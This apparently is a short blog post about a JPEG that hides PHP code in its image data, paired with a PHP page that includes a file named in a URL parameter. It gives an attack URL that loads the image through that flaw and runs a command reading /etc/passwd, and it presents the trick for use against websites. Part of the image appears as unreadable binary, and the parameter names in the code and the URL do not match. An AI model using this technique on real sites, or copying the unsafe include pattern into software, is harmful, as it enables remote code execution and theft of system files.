Bulletproof

 druide

What is the particularity of this image ?

She isn't beautiful, OK... anymore ? No ? Try this in a shell

$ cat /path/to/image/1.jpg


And now ? Hooo i can see a little php code in the image !??!! What is it ? and how can use it ?


?��-�&X.-J����
                         ��ʠ�r\灻o/.%


To use this image you must find a web site that includes a file like this

// some code

$page = $_GET["action_page"];
include $page;

// rest of the code


And then it remains only to use an url like this


http://localhost/test.php?page=1.jpg&c=cat%20/etc/passwd

ÿØÿàJFIFÿþ>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality ÿÛC    $.' ",#(7),01444
'9=82
Image source with related article : http://virtualabs.fr/Nasty-bulletproof-Jpegs-l

Tags: hacking image php

  • 8 years 4 months before
  • |